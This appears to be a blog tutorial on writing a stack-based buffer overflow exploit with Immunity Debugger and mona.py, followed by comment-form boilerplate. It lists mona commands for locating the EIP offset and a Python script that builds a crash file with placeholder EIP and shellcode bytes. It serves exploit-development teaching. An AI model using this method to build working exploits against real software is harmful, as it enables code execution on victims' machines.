Writing Exploits with Mona

Source: http://blog.pusheax.com/2013/03/exploit-writing-stack-based-buffer.html

0. ImmunityDebugger
1. !mona update
2. Attach to the process2. !mona config -set workingfolder c:\logs\%p
3. !mona pattern_create 2000
4 !mona pattern_offset 37694136 (EIP value — during the crash)
5. Modify the script

print “Creating exploit.”
f=open(“crash-me.PLF”,”w”)
#Create the file
push=”A”*260 #Found by mona.py
eip =”BBBB” #more 4 bytes to overwrite EIP
junk=”C”*1736 #Later will replace this with real shellcode
try:
f.write(push+eip+junk)
f.close()
print “File created”
except:
print “File cannot be created”

Our Next goal will be:
1. Replacing “BBBB” with valid pointer (Pointer to esp and esp will hold shellcode)
2. Solving an(CCCC… after EIP) easy problem.
3. Replacing “CCCCCC…” with real shellcode.

6. !mona jmp -r esp -o

Leave a Reply Cancel reply

Enter your comment here...

Fill in your details below or click an icon to log in:

Email (required) (Address never made public)

Name (required)

Website

You are commenting using your WordPress.com account. ( Log Out / Change )

You are commenting using your Facebook account. ( Log Out / Change )

Cancel

Connecting to %s

%d bloggers like this:

	Peter Kruse on Let’s Learn: In-Depth on…
	mark Johnson on Malware Traffic Internals: Bla…
	Passion on Let’s Learn: In-Depth Re…
	Unknown on Programming Challenge in …
	Hung-Ting on Installing Cuckoo Sandbox on M…

	Peter Kruse on Let’s Learn: In-Depth on…
	mark Johnson on Malware Traffic Internals: Bla…
	Passion on Let’s Learn: In-Depth Re…
	Unknown on Programming Challenge in …
	Hung-Ting on Installing Cuckoo Sandbox on M…

	Peter Kruse on Let’s Learn: In-Depth on…
	mark Johnson on Malware Traffic Internals: Bla…
	Passion on Let’s Learn: In-Depth Re…
	Unknown on Programming Challenge in …
	Hung-Ting on Installing Cuckoo Sandbox on M…

Share this:

Like this:

Related

Leave a Reply Cancel reply